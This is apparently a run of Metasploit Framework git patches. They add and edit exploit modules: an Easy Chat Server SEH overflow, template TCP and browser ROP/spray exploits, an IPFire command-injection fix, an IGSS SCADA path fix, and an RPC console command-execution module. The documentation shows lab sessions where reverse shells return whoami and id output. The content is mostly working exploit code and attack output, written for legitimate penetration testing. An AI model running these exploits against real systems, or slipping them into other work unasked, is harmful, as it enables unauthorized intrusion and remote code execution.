Date: Tue, 20 Jun 2017 00:52:29 +0200 Subject: [PATCH 11/63] Correct EDB Number --- modules/exploits/windows/http/easychatserver_seh.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/http/easychatserver_seh.rb b/modules/exploits/windows/http/easychatserver_seh.rb index 906614f189..a49c33912c 100644 --- a/modules/exploits/windows/http/easychatserver_seh.rb +++ b/modules/exploits/windows/http/easychatserver_seh.rb @@ -24,7 +24,7 @@ class MetasploitModule < Msf::Exploit::Remote 'License' => MSF_LICENSE, 'References' => [ - [ 'EDB', '42186' ], + [ 'EDB', '42155' ], ], 'Privileged' => true, 'Payload' => From af4eb0fbe3e9b9a12b87587bf2bafe74aa4a0487 Mon Sep 17 00:00:00 2001 From: Mzack9999 Date: Tue, 20 Jun 2017 00:55:18 +0200 Subject: [PATCH 12/63] Corrected shellcode --- modules/exploits/windows/http/easychatserver_seh.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/exploits/windows/http/easychatserver_seh.rb b/modules/exploits/windows/http/easychatserver_seh.rb index a49c33912c..b6973d7375 100644 --- a/modules/exploits/windows/http/easychatserver_seh.rb +++ b/modules/exploits/windows/http/easychatserver_seh.rb @@ -51,7 +51,6 @@ class MetasploitModule < Msf::Exploit::Remote sploit << [target.ret].pack('V') sploit << payload.encoded sploit << rand_text_alpha_upper(200) - sploit << [target.ret].pack('V') request = "POST /registresult.htm HTTP/1.1\r\n\r\nUserName=#{sploit}&Password=test&Password1=test&Sex=1&Email=x@&Icon=x.gif&Resume=xxxx&cw=1&RoomID=4&RepUserName=admin&submit1=Register" connect From 3b248c78f35afa895ba06c51024d6b9ef10b37a0 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Fri, 31 Mar 2017 10:58:43 -0500 Subject: [PATCH 13/63] resurrect old example modules, integrate into module tree --- lib/msf/core/modules/loader/base.rb | 3 +- lib/msf/core/modules/loader/directory.rb | 6 +- modules/auxiliary/example.rb | 44 ++++++ .../example.rb} | 0 modules/exploits/example.rb | 95 ++++++++++++ modules/exploits/windows/browser/example.rb | 144 ++++++++++++++++++ modules/exploits/windows/http/dupscts_bof.rb | 2 - 7 files changed, 288 insertions(+), 6 deletions(-) create mode 100644 modules/auxiliary/example.rb rename modules/auxiliary/scanner/{udp_scanner_template.rb => udp/example.rb} (100%) create mode 100644 modules/exploits/example.rb create mode 100644 modules/exploits/windows/browser/example.rb diff --git a/lib/msf/core/modules/loader/base.rb b/lib/msf/core/modules/loader/base.rb index 720ccce593..fea6343a51 100644 --- a/lib/msf/core/modules/loader/base.rb +++ b/lib/msf/core/modules/loader/base.rb @@ -173,7 +173,8 @@ class Msf::Modules::Loader::Base true } - loaded = namespace_module_transaction(type + "/" + module_reference_name, :reload => reload, &try_eval_module) + loaded = namespace_module_transaction(type + "/" + module_reference_name, + :reload => reload, &try_eval_module) unless loaded return false end diff --git a/lib/msf/core/modules/loader/directory.rb b/lib/msf/core/modules/loader/directory.rb index 2dbf15cb84..e78d371f7d 100644 --- a/lib/msf/core/modules/loader/directory.rb +++ b/lib/msf/core/modules/loader/directory.rb @@ -28,12 +28,11 @@ class Msf::Modules::Loader::Directory < Msf::Modules::Loader::Base def each_module_reference_name(path, opts={}) whitelist = opts[:whitelist] || [] ::Dir.foreach(path) do |entry| + full_entry_path = ::File.join(path, entry) type = entry.singularize - unless ::File.directory?(full_entry_path) && module_manager.type_enabled?(type) - next - end + next unless ::File.directory?(full_entry_path) && module_manager.type_enabled?(type) full_entry_pathname = Pathname.new(full_entry_path) @@ -43,6 +42,7 @@ class Msf::Modules::Loader::Directory < Msf::Modules::Loader::Base entry_descendant_pathname = Pathname.new(entry_descendant_path) relative_entry_descendant_pathname = entry_descendant_pathname.relative_path_from(full_entry_pathname) relative_entry_descendant_path = relative_entry_descendant_pathname.to_s + next if File::basename(relative_entry_descendant_path) == "example.rb" # The module_reference_name doesn't have a file extension module_reference_name = module_reference_name_from_path(relative_entry_descendant_path) diff --git a/modules/auxiliary/example.rb b/modules/auxiliary/example.rb new file mode 100644 index 0000000000..04b8920396 --- /dev/null +++ b/modules/auxiliary/example.rb @@ -0,0 +1,44 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +### +# +# This sample auxiliary module simply displays the selected action and +# registers a custom command that will show up when the module is used. +# +### +class MetasploitModule < Msf::Auxiliary + + def initialize(info={}) + super(update_info(info, + 'Name' => 'Sample Auxiliary Module', + # The description can be multiple lines, but does not preserve formatting. + 'Description' => 'Sample Auxiliary Module', + 'Author' => ['Joe Module '], + 'License' => MSF_LICENSE, + 'Actions' => + [ + ['Default Action'], + ['Another Action'] + ] + )) + + end + + def run + print_status("Running the simple auxiliary module with action #{action.name}") + end + + # auxiliary modules can register new commands, they all call cmd_* to + # dispatch them + def auxiliary_commands + return { "aux_extra_command" => "Run this auxiliary test commmand" } + end + + def cmd_aux_extra_command(*args) + print_status("Running inside aux_extra_command(#{args.join(" ")})") + end + +end diff --git a/modules/auxiliary/scanner/udp_scanner_template.rb b/modules/auxiliary/scanner/udp/example.rb similarity index 100% rename from modules/auxiliary/scanner/udp_scanner_template.rb rename to modules/auxiliary/scanner/udp/example.rb diff --git a/modules/exploits/example.rb b/modules/exploits/example.rb new file mode 100644 index 0000000000..82e225e634 --- /dev/null +++ b/modules/exploits/example.rb @@ -0,0 +1,95 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +### +# +# This exploit sample shows how an exploit module could be written to exploit +# a bug in an arbitrary TCP server. +# +### +class MetasploitModule < Msf::Exploit::Remote + Rank = NormalRanking + + # + # This exploit affects TCP servers, so we use the TCP client mixin. + # See ./documentation/samples/vulnapps/testsrv/testsrv.c for building the + # vulnerable target program. + # + include Exploit::Remote::Tcp + + def initialize(info = {}) + super(update_info(info, + # The Name should be just like the line of a Git commit - software name, + # vuln type, class. It needs to fit in 50 chars ideally. Preferably apply + # some search optimization so people can actually find the module. + # We encourage consistency between module name and file name. + 'Name' => 'Sample Exploit', + 'Description' => %q{ + This exploit module illustrates how a vulnerability could be exploited + in an TCP server that has a parsing bug. + }, + 'License' => MSF_LICENSE, + 'Author' => ['skape'], + 'References' => + [ + [ 'OSVDB', '12345' ], + [ 'EDB', '12345' ], + [ 'URL', 'http://www.example.com'], + [ 'CVE', '1978-1234'], + ], + 'Payload' => + { + 'Space' => 1000, + 'BadChars' => "\x00", + }, + 'Targets' => + [ + # Target 0: Windows All + [ + 'Windows XP/Vista/7/8', + { + 'Platform' => 'win', + 'Ret' => 0x41424344 + } + ], + ], + 'DisclosureDate' => "Apr 1 2013", + # Note that this is by index, rather than name. It's generally easiest + # just to put the default at the beginning of the list and skip this + # entirely. + 'DefaultTarget' => 0)) + end + + # + # The sample exploit just indicates that the remote host is always + # vulnerable. + # + def check + Exploit::CheckCode::Vulnerable + end + + # + # The exploit method connects to the remote service and sends 1024 random bytes + # followed by the fake return address and then the payload. + # + def exploit + connect + + print_status("Sending #{payload.encoded.length} byte payload...") + + # Build the buffer for transmission + buf = rand_text_alpha(1024) + buf << [ target.ret ].pack('V') + buf << payload.encoded + + # Send it off + sock.put(buf) + sock.get_once + + handler + end + +end + diff --git a/modules/exploits/windows/browser/example.rb b/modules/exploits/windows/browser/example.rb new file mode 100644 index 0000000000..177482f92a --- /dev/null +++ b/modules/exploits/windows/browser/example.rb @@ -0,0 +1,144 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +### +# +# This exploit sample demonstrates how a typical browser exploit is written using commonly +# used components such as: HttpServer, BrowserAutopwn, RopDB, DOM Element Property Spray. +# +### +class MetasploitModule < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::HttpServer::HTML + include Msf::Exploit::RopDb + include Msf::Exploit::Remote::BrowserAutopwn + + # Set :classid and :method for ActiveX exploits. For example: + # :classid => "{C3B92104-B5A7-11D0-A37F-00A0248F0AF1}", + # :method => "SetShapeNodeType", + autopwn_info({ + :ua_name => HttpClients::IE, + :ua_minver => "8.0", + :ua_maxver => "10.0", + :javascript => true, + :os_name => OperatingSystems::Match::WINDOWS, + :rank => NormalRanking + }) + + def initialize(info={}) + super(update_info(info, + 'Name' => "Module Name", + 'Description' => %q{ + This template covers IE8/9/10, and uses the user-agent HTTP header to detect + the browser version. Please note IE8 and newer may emulate an older IE version + in compatibility mode, in that case the module won't be able to detect the + browser correctly. + }, + 'License' => MSF_LICENSE, + 'Author' => [ 'sinn3r' ], + 'References' => + [ + [ 'URL', 'http://metasploit.com' ] + ], + 'Platform' => 'win', + 'Targets' => + [ + [ 'Automatic', {} ], + [ 'IE 8 on Windows XP SP3', { 'Rop' => :jre } ], + [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ], + [ 'IE 8 on Windows 7', { 'Rop' => :jre } ], + [ 'IE 9 on Windows 7', { 'Rop' => :jre } ], + [ 'IE 10 on Windows 8', { 'Rop' => :jre } ] + ], + 'Payload' => + { + 'BadChars' => "\x00", # js_property_spray + 'StackAdjustment' => -3500 + }, + 'Privileged' => false, + 'DisclosureDate' => "Apr 1 2013", + 'DefaultTarget' => 0)) + end + + def get_target(agent) + return target if target.name != 'Automatic' + + nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || '' + ie = agent.scan(/MSIE (\d)/).flatten[0] || '' + + ie_name = "IE #{ie}" + + case nt + when '5.1' + os_name = 'Windows XP SP3' + when '6.0' + os_name = 'Windows Vista' + when '6.1' + os_name = 'Windows 7' + when '6.2' + os_name = 'Windows 8' + when '6.3' + os_name = 'Windows 8.1' + end + + targets.each do |t| + if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name)) + return t + end + end + + nil + end + + def get_payload(t) + stack_pivot = "\x41\x42\x43\x44" + code = payload.encoded + + case t['Rop'] + when :msvcrt + print_status("Using msvcrt ROP") + rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'}) + + else + print_status("Using JRE ROP") + rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot}) + end + + rop_payload + end + + + def get_html(t) + js_p = ::Rex::Text.to_unescape(get_payload(t), ::Rex::Arch.endian(t.arch)) + html = %Q| + + | + + html.gsub(/^\t\t/, '') + end + + + def on_request_uri(cli, request) + agent = request.headers['User-Agent'] + print_status("Requesting: #{request.uri}") + + target = get_target(agent) + if target.nil? + print_error("Browser not supported, sending 404: #{agent}") + send_not_found(cli) + return + end + + print_status("Target selected as: #{target.name}") + html = get_html(target) + send_response(cli, html, { 'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache' }) + end +end diff --git a/modules/exploits/windows/http/dupscts_bof.rb b/modules/exploits/windows/http/dupscts_bof.rb index f2479dc7ac..7425c4dfe3 100644 --- a/modules/exploits/windows/http/dupscts_bof.rb +++ b/modules/exploits/windows/http/dupscts_bof.rb @@ -3,8 +3,6 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'msf/core' - class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking From a8865252da5acc3355c14d06fdc45f3cb83d15bd Mon Sep 17 00:00:00 2001 From: Mzack9999 Date: Fri, 23 Jun 2017 14:12:04 +0200 Subject: [PATCH 14/63] Added exploit documentation --- .../windows/http/easychatserver_seh.md | 53 +++++++++++++++++++ 1 file changed, 53 insertions(+) create mode 100644 modules/exploits/windows/http/easychatserver_seh.md diff --git a/modules/exploits/windows/http/easychatserver_seh.md b/modules/exploits/windows/http/easychatserver_seh.md new file mode 100644 index 0000000000..eaf8a0744f --- /dev/null +++ b/modules/exploits/windows/http/easychatserver_seh.md @@ -0,0 +1,53 @@ +## Description + +This module exploits a vulnerability in the EFS Easy Chat Server application, from version 2 to 3.1, affecting the username parameter in Registration page 'register.ghp', which is prone to a stack overflow vulnerability. + +This module allows a remote attacker to get a payload executed under the context of the user running the Easy Chat Server application + +## Vulnerable Application + +[Easy Chat Server](http://echatserver.com/) Easy Chat Server is a easy, fast and affordable way to host and manage real-time communication software. + +This module has been tested successfully on + +* Easy Chat Server 3.1 on Windows XP En SP3 + +Installers: + +[EFS Easy Chat Server Installers](http://echatserver.com/ecssetup.exe) + +## Verification Steps + +1. Start `msfconsole` +2. Do: `use exploits/windows/http/easychatserver_seh` +3. Do: `set rhosts [IP]` +4. Do: `exploit` +5. You should get your payload executed + +## Scenarios + +``` +marco@kali:~$ msfconsole -q +msf > use exploit/windows/http/easychatserver_seh +msf exploit(easychatserver_seh) > set RHOST 192.168.56.101 +RHOST => 192.168.56.101 +msf exploit(easychatserver_seh) > exploit + +[*] Started reverse TCP handler on 192.168.56.1:4444 +[*] Sending stage (957487 bytes) to 192.168.56.101 +[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1037) at 2017-06-20 00:43:51 +0200 + +meterpreter > sysinfo +Computer : MM-8B040C5B05D9 +OS : Windows XP (Build 2600, Service Pack 3). +Architecture : x86 +System Language : en_US +Domain : WORKGROUP +Logged On Users : 2 +Meterpreter : x86/windows +meterpreter > exit +[*] Shutting down Meterpreter... + +[*] 192.168.56.101 - Meterpreter session 1 closed. Reason: User exit +msf exploit(easychatserver_seh) > +``` From f9493f46d7ce8db9ef03f7aae20706c3fd8d80d8 Mon Sep 17 00:00:00 2001 From: h00die Date: Sat, 24 Jun 2017 14:06:11 -0400 Subject: [PATCH 15/63] bcole fixes --- .../linux/http/ipfire_oinkcode_exec.rb | 24 ++++++++++--------- 1 file changed, 13 insertions(+), 11 deletions(-) diff --git a/modules/exploits/linux/http/ipfire_oinkcode_exec.rb b/modules/exploits/linux/http/ipfire_oinkcode_exec.rb index e4ad96b6ce..7dad137ea5 100644 --- a/modules/exploits/linux/http/ipfire_oinkcode_exec.rb +++ b/modules/exploits/linux/http/ipfire_oinkcode_exec.rb @@ -66,17 +66,20 @@ class MetasploitModule < Msf::Exploit::Remote 'method' => 'GET', 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']) ) - fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil? - fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code != 200 - /\IPFire (?[\d.]{4}) \([\w]+\) - Core Update (?[\d]+)/ =~ res.body - if version && update && version.eql? "2.19" && update.to_i <= 110 + if res and res.code == 200 + /\IPFire (?[\d.]{4}) \([\w]+\) - Core Update (?[\d]+)/ =~ res.body + end + + # now that we've pulled the info we need, check version. + if version && update && version.eql == '2.19' && update.to_i <= 110 CheckCode::Appears else CheckCode::Safe end + rescue ::Rex::ConnectionError - fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") + CheckCode::Safe end end @@ -84,13 +87,14 @@ class MetasploitModule < Msf::Exploit::Remote begin # authorization header required, see https://github.com/rapid7/metasploit-framework/pull/6433#r56764179 # after a chat with @bcoles in IRC. + vprint_status('Sending request') res = send_request_cgi( 'uri' => '/cgi-bin/ids.cgi', 'method' => 'POST', 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), 'headers' => { - 'Referer' => "#{datstore['SSL'] ? 'https' : 'http'}://#{datastore['RHOST']}:#{datastore['RPORT']}/cgi-bin/ids.cgi" + 'Referer' => "#{datastore['SSL'] ? 'https' : 'http'}://#{datastore['RHOST']}:#{datastore['RPORT']}/cgi-bin/ids.cgi" }, 'vars_post' => { 'ENABLE_SNORT_GREEN' => 'on', @@ -102,11 +106,9 @@ class MetasploitModule < Msf::Exploit::Remote } ) - # success means we hang our session, and wont get back a response - if res - fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code != 200 - else - fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") + # success means we hang our session, and wont get back a response, so just check we get a response back + if res && res.code != 200 + fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") end rescue ::Rex::ConnectionError From 66eb89e72a3a67910874921bfd24e41ca3d2cfa3 Mon Sep 17 00:00:00 2001 From: Mzack9999 Date: Sun, 25 Jun 2017 16:33:17 +0200 Subject: [PATCH 16/63] Exploit now uses HTTP mixin --- .../windows/http/easychatserver_seh.rb | 29 ++++++++++++++----- 1 file changed, 21 insertions(+), 8 deletions(-) diff --git a/modules/exploits/windows/http/easychatserver_seh.rb b/modules/exploits/windows/http/easychatserver_seh.rb index b6973d7375..b006ffa586 100644 --- a/modules/exploits/windows/http/easychatserver_seh.rb +++ b/modules/exploits/windows/http/easychatserver_seh.rb @@ -7,8 +7,7 @@ class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking - include Msf::Exploit::Remote::Tcp - #include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, @@ -18,8 +17,8 @@ class MetasploitModule < Msf::Exploit::Remote }, 'Author' => [ - 'Aitezaz Mohsin', #POC - 'Marco Rivoli ' #Metasploit + 'Marco Rivoli', #Metasploit + 'Aitezaz Mohsin' #POC ], 'License' => MSF_LICENSE, 'References' => @@ -52,10 +51,24 @@ class MetasploitModule < Msf::Exploit::Remote sploit << payload.encoded sploit << rand_text_alpha_upper(200) - request = "POST /registresult.htm HTTP/1.1\r\n\r\nUserName=#{sploit}&Password=test&Password1=test&Sex=1&Email=x@&Icon=x.gif&Resume=xxxx&cw=1&RoomID=4&RepUserName=admin&submit1=Register" - connect - sock.put(request) + res = send_request_cgi({ + 'uri' => normalize_uri(URI,'registresult.htm'), + 'method' => 'POST', + 'vars_post' => { + 'UserName' => sploit, + 'Password' => 'test', + 'Password1' => 'test', + 'Sex' => 1, + 'Email' => 'x@', + 'Icon' => 'x.gif', + 'Resume' => 'xxxx', + 'cw' => 1, + 'RoomID' => 4, + 'RepUserName' => 'admin', + 'submit1' => 'Register' + } + }) handler - disconnect + end end From 45af65199360bc05ef8179deb15031756f4dad5a Mon Sep 17 00:00:00 2001 From: syndrome5 Date: Tue, 4 Jul 2017 22:14:32 +0200 Subject: [PATCH 17/63] Fix issue generate/launch path Generate file in C:\ but try to launch it in Documents and Settings\All Users\Application Data\7T\ PoC with windows/meterpreter/reverse_tcp --- modules/exploits/windows/scada/igss9_misc.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/windows/scada/igss9_misc.rb b/modules/exploits/windows/scada/igss9_misc.rb index 3c5cf7ea0a..99b161fa8a 100644 --- a/modules/exploits/windows/scada/igss9_misc.rb +++ b/modules/exploits/windows/scada/igss9_misc.rb @@ -117,8 +117,8 @@ class MetasploitModule < Msf::Exploit::Remote pkt << "\x00\x00" pkt << "\x0A" pkt << "\x00"*31 - pkt << "#{base}Documents and Settings\\All Users\\Application Data\\7T\\#{filename}\"" - pkt << "\x00"*143 + pkt << "#{base}#{filename}\"" + pkt << "\x00"*163 #only for 1 caracter + .exe (i.exe for example) return pkt end From baff473caedc06271d390b9c175172465d8f9db0 Mon Sep 17 00:00:00 2001 From: Brendan Coles Date: Wed, 5 Jul 2017 08:48:35 +0000 Subject: [PATCH 18/63] Add Metasploit RPC Console Command Execution module --- .../exploit/multi/misc/msf_rpc_console.md | 142 ++++++++++++++++ .../exploits/multi/misc/msf_rpc_console.rb | 152 ++++++++++++++++++ 2 files changed, 294 insertions(+) create mode 100644 documentation/modules/exploit/multi/misc/msf_rpc_console.md create mode 100644 modules/exploits/multi/misc/msf_rpc_console.rb diff --git a/documentation/modules/exploit/multi/misc/msf_rpc_console.md b/documentation/modules/exploit/multi/misc/msf_rpc_console.md new file mode 100644 index 0000000000..52c2d4f225 --- /dev/null +++ b/documentation/modules/exploit/multi/misc/msf_rpc_console.md @@ -0,0 +1,142 @@ +## Description + + This module connects to a specified Metasploit RPC server and uses the *console.write* procedure to execute operating system commands. Valid credentials are required to access the RPC interface. + + +## Vulnerable Application + + [Metasploit](https://www.rapid7.com/products/metasploit/) is the world's most used penetration testing software. The RPC API can be used to programmatically drive the Metasploit Framework and Metasploit Pro products. + + To start the RPC service, run `msfrpcd -U msf -P abc123`; or run `load msgrpc ServerHost=0.0.0.0 ServerPort=55552 User=msf Pass=abc123 SSL=Y` from within msfconsole. + + This module has been tested successfully on: + + * Metasploit 4.15 on Kali 1.0.6 + * Metasploit 4.14 on Kali 2017.1 + * Metasploit 4.14 on Windows 7 SP1 + + Source and Installers: + + * [Source Code Repository](https://github.com/rapid7/metasploit-framework) + * [Installers](https://github.com/rapid7/metasploit-framework/wiki/Downloads-by-Version) + +## Verification Steps + + 1. Start `msfconsole` + 2. Do: `use exploit/multi/misc/msf_rpc_console` + 3. Do: `set RHOST [IP]` + 4. Do: `set RPORT [PORT]` (default: `55552`) + 5. Do: `set USERNAME [USERNAME]` (default: `msf`) + 6. Do: `set PASSWORD [PASSWORD]` + 7. Do: `set LHOST [IP]` + 8. Do: `run` + 9. You should get a session + + +## Options + + **Username** + + The username for Metasploit RPC (default: `msf`). + + **Password** + + The password for the RPC user. + + +## Scenarios + +### Ruby Target + + ``` + msf > use exploit/multi/misc/msf_rpc_console + msf exploit(msf_rpc_console) > set rhost 172.16.191.166 + rhost => 172.16.191.166 + msf exploit(msf_rpc_console) > set username msf + username => msf + msf exploit(msf_rpc_console) > set password abc123 + password => abc123 + msf exploit(msf_rpc_console) > set lhost 172.16.191.181 + lhost => 172.16.191.181 + msf exploit(msf_rpc_console) > set target 0 + target => 0 + msf exploit(msf_rpc_console) > run + + [*] Started reverse TCP handler on 172.16.191.181:4444 + [+] 172.16.191.166:55552 - Authenticated successfully + [*] 172.16.191.166:55552 - Metasploit 4.14.28-dev + [*] 172.16.191.166:55552 - Ruby 2.3.3 x64-mingw32 2016-11-21 + [*] 172.16.191.166:55552 - API version 1.0 + [+] 172.16.191.166:55552 - Created console #0 + [*] 172.16.191.166:55552 - Sending payload... + [*] Command shell session 1 opened (172.16.191.181:4444 -> 172.16.191.166:52984) at 2017-07-05 03:40:50 -0400 + + whoami + win-sgbsd5tqutq\user + ``` + +### Windows CMD Target + + ``` + msf > use exploit/multi/misc/msf_rpc_console + msf exploit(msf_rpc_console) > set rhost 172.16.191.166 + rhost => 172.16.191.166 + msf exploit(msf_rpc_console) > set username msf + username => msf + msf exploit(msf_rpc_console) > set password abc123 + password => abc123 + msf exploit(msf_rpc_console) > set lhost 172.16.191.181 + lhost => 172.16.191.181 + msf exploit(msf_rpc_console) > set target 0 + target => 1 + msf exploit(msf_rpc_console) > set payload cmd/windows/powershell_reverse_tcp + payload => cmd/windows/powershell_reverse_tcp + msf exploit(msf_rpc_console) > run + + [*] Started reverse SSL handler on 172.16.191.181:4444 + [+] 172.16.191.166:55552 - Authenticated successfully + [*] 172.16.191.166:55552 - Metasploit 4.14.28-dev + [*] 172.16.191.166:55552 - Ruby 2.3.3 x64-mingw32 2016-11-21 + [*] 172.16.191.166:55552 - API version 1.0 + [+] 172.16.191.166:55552 - Created console #1 + [*] 172.16.191.166:55552 - Sending payload... + [*] Powershell session session 2 opened (172.16.191.181:4444 -> 172.16.191.166:52996) at 2017-07-05 03:44:05 -0400 + + Windows PowerShell running as user user on WIN-SGBSD5TQUTQ + Copyright (C) 2015 Microsoft Corporation. All rights reserved. + + PS C:\metasploit>whoami + win-sgbsd5tqutq\user + ``` + +### Unix CMD Target + + ``` + msf > use exploit/multi/misc/msf_rpc_console + msf exploit(msf_rpc_console) > set rhost 172.16.191.215 + rhost => 172.16.191.215 + msf exploit(msf_rpc_console) > set username msf + username => msf + msf exploit(msf_rpc_console) > set password abc123 + password => abc123 + msf exploit(msf_rpc_console) > set lhost 172.16.191.181 + lhost => 172.16.191.181 + msf exploit(msf_rpc_console) > set target 2 + target => 2 + msf exploit(msf_rpc_console) > set payload cmd/unix/reverse_python + payload => cmd/unix/reverse_python + msf exploit(msf_rpc_console) > run + + [*] Started reverse TCP handler on 172.16.191.181:4444 + [+] 172.16.191.215:55552 - Authenticated successfully + [*] 172.16.191.215:55552 - Metasploit 4.15.0-dev-aceeedc + [*] 172.16.191.215:55552 - Ruby 2.3.0 x86_64-linux 2015-12-25 + [*] 172.16.191.215:55552 - API version 1.0 + [+] 172.16.191.215:55552 - Created console #0 + [*] 172.16.191.215:55552 - Sending payload... + [*] Command shell session 3 opened (172.16.191.181:4444 -> 172.16.191.215:40768) at 2017-07-05 03:46:11 -0400 + + id + uid=0(root) gid=0(root) groups=0(root) + ``` + diff --git a/modules/exploits/multi/misc/msf_rpc_console.rb b/modules/exploits/multi/misc/msf_rpc_console.rb new file mode 100644 index 0000000000..806e5e0c54 --- /dev/null +++ b/modules/exploits/multi/misc/msf_rpc_console.rb @@ -0,0 +1,152 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/rpc/v10/client' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::Tcp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Metasploit RPC Console Command Execution', + 'Description' => %q{ + This module connects to a specified Metasploit RPC server and + uses the 'console.write' procedure to execute operating + system commands. Valid credentials are required to access the + RPC interface. + + This module has been tested successfully on Metasploit 4.15 + on Kali 1.0.6; Metasploit 4.14 on Kali 2017.1; and Metasploit + 4.14 on Windows 7 SP1. + }, + 'License' => MSF_LICENSE, + 'Author' => 'Brendan Coles ', + 'References' => + [ + [ 'URL', 'https://help.rapid7.com/metasploit/Content/api/rpc/overview.html' ], + [ 'URL', 'https://community.rapid7.com/docs/DOC-1516' ] + ], + 'Platform' => %w{ ruby unix win }, + 'Targets' => [ + [ 'Ruby', { 'Arch' => ARCH_RUBY, + 'Platform' => 'ruby', + 'Payload' => { 'BadChars' => "\x00" } } ], + [ 'Windows CMD', { 'Arch' => ARCH_CMD, + 'Platform' => 'win', + 'Payload' => { 'BadChars' => "\x00\x0A\x0D" } } ], + [ 'Unix CMD', { 'Arch' => ARCH_CMD, + 'Platform' => 'unix', + 'Payload' => { 'BadChars' => "\x00\x0A\x0D" } } ] + ], + 'DefaultOptions' => { 'PrependFork' => true, 'WfsDelay' => 15 }, + 'Privileged' => false, + 'DisclosureDate' => 'May 22 2011', + 'DefaultTarget' => 0)) + register_options [ Opt::RPORT(55552), + OptString.new('USERNAME', [true, 'Username for Metasploit RPC', 'msf']), + OptString.new('PASSWORD', [true, 'Password for the specified username', '']), + OptBool.new('SSL', [ true, 'Use SSL', true]) ] + end + + def execute_command(cmd, opts = {}) + res = @rpc.call 'console.write', @console_id, "\r\n#{cmd}\r\n" + + if res.nil? + fail_with Failure::Unknown, 'Connection failed' + end + + unless res['wrote'].to_s =~ /\A\d+\z/ + print_error "Could not write to console #{@console_id}:" + print_line res.to_s + return + end + + vprint_good "Wrote #{res['wrote']} bytes to console" + end + + def exploit + begin + @rpc = Msf::RPC::Client.new :host => rhost, :port => rport, :ssl => ssl + rescue Rex::ConnectionRefused => e + fail_with Failure::Unreachable, 'Connection refused' + rescue => e + fail_with Failure::Unknown, "Connection failed: #{e}" + end + + res = @rpc.login datastore['USERNAME'], datastore['PASSWORD'] + + if @rpc.token.nil? + fail_with Failure::NoAccess, 'Authentication failed' + end + + print_good 'Authenticated successfully' + vprint_status "Received temporary token: #{@rpc.token}" + + version = @rpc.call 'core.version' + + if res.nil? + fail_with Failure::Unknown, 'Connection failed' + end + + print_status "Metasploit #{version['version']}" + print_status "Ruby #{version['ruby']}" + print_status "API version #{version['api']}" + + vprint_status 'Creating new console...' + res = @rpc.call 'console.create' + + if res.nil? + fail_with Failure::Unknown, 'Connection failed' + end + + unless res['id'].to_s =~ /\A\d+\z/ + print_error 'Could not create console:' + print_line res.to_s + return + end + + @console_id = res['id'] + print_good "Created console ##{@console_id}" + + print_status 'Sending payload...' + + case target['Platform'] + when 'ruby' + cmd = "ruby -e 'eval(%[#{Rex::Text.encode_base64(payload.encoded)}].unpack(%[m0]).first)'" + when 'win' + cmd = payload.encoded + when 'unix' + cmd = payload.encoded + else + fail_with Failure::NoTarget, 'Invalid target' + end + + execute_command cmd + end + + def cleanup + return if @console_id.nil? + + vprint_status 'Removing console...' + res = @rpc.call 'console.destroy', @console_id + + if res.nil? + print_error 'Connection failed' + return + end + + unless res['result'].eql? 'success' + print_warning "Could not destroy console ##{@console_id}:" + print_line res.to_s + return + end + + vprint_good "Destroyed console ##{@console_id}" + ensure + @rpc.close + end +end From d24e2943ca7189517f02319612336257d221e3d0 Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Mon, 10 Jul 2017 16:38:10 +0200 Subject: [PATCH 19/63] update docker stuff --- docker/bin/msfvenom | 4 ++++ docker/bin/msfvenom-dev | 26 ++++++++++++++++++++++++++ metasploit-framework.gemspec | 4 +++- 3 files changed, 33 insertions(+), 1 deletion(-) create mode 100755 docker/bin/msfvenom-dev diff --git a/docker/bin/msfvenom b/docker/bin/msfvenom index 2b12210b4f..3efc05168d 100755 --- a/docker/bin/msfvenom +++ b/docker/bin/msfvenom @@ -17,5 +17,9 @@ if [[ -z "$MSF_PATH" ]]; then MSF_PATH=$(dirname $(dirname $path)) fi +if [[ -n "$MSF_BUILD" ]]; then + docker-compose -f $MSF_PATH/docker-compose.yml build +fi + cd $MSF_PATH docker-compose run --rm --service-ports ms ./msfvenom "$@" diff --git a/docker/bin/msfvenom-dev b/docker/bin/msfvenom-dev new file mode 100755 index 0000000000..32b1049748 --- /dev/null +++ b/docker/bin/msfvenom-dev @@ -0,0 +1,26 @@ +#! /bin/bash + +if [[ -z "$MSF_PATH" ]]; then + path=`dirname $0` + + # check for ./docker/msfconsole.rc + if [[ ! -f $path/../msfconsole.rc ]] ; then + + # we 